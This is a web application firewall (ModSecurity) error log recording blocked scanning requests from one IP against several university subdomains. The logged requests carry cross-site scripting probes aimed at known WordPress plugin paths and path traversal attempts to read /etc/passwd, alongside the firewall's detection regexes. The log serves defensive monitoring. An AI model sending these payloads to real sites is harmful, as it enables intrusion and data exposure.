[Tue Aug 29 11:51:23.735723 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnHQdwAAAAT"]
[Tue Aug 29 11:51:23.754637 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnTlKEAAAAA"]
[Tue Aug 29 11:51:23.759604 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAm-MdEAAAAI"]
[Tue Aug 29 11:51:23.764457 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAkr0FcAAAAC"]
[Tue Aug 29 11:51:23.771301 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnIlgUAAAAV"]
[Tue Aug 29 11:51:23.803613 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><img s found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnB5VMAAAAJ"]
[Tue Aug 29 11:51:24.760857 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnIlgcAAAAV"]
[Tue Aug 29 11:51:24.905565 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAfWOEkAAAAL"]
[Tue Aug 29 11:51:24.906747 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnHQd8AAAAT"]
[Tue Aug 29 11:51:24.912749 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAmIbQMAAAAo"]
[Tue Aug 29 11:51:24.914414 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAjdQUYAAAAZ"]
[Tue Aug 29 11:51:24.916360 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15TMCo-f0AAAkyyE8AAAAW"]
[Tue Aug 29 11:51:24.918677 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAmQ-xQAAAAb"]
[Tue Aug 29 11:51:24.985623 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAmHd-AAAAAz"]
[Tue Aug 29 11:51:24.996808 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAkr0FwAAAAC"]
[Tue Aug 29 11:51:25.011201 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAmNp4oAAAAQ"]
[Tue Aug 29 11:51:25.015847 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAnHQeEAAAAT"]
[Tue Aug 29 11:51:25.607140 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAnIlgsAAAAV"]
[Tue Aug 29 11:51:25.640984 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TcCo-f0AAAmQ-xcAAAAb"]
[Tue Aug 29 11:51:26.662651 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAmHd-EAAAAz"]
[Tue Aug 29 11:51:26.689376 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAm-MdgAAAAI"]
[Tue Aug 29 11:51:26.692713 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnHQeMAAAAT"]
[Tue Aug 29 11:51:26.732313 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAkyyFQAAAAW"]
[Tue Aug 29 11:51:26.780589 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnTlKYAAAAA"]
[Tue Aug 29 11:51:26.784442 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAnHQeQAAAAT"]
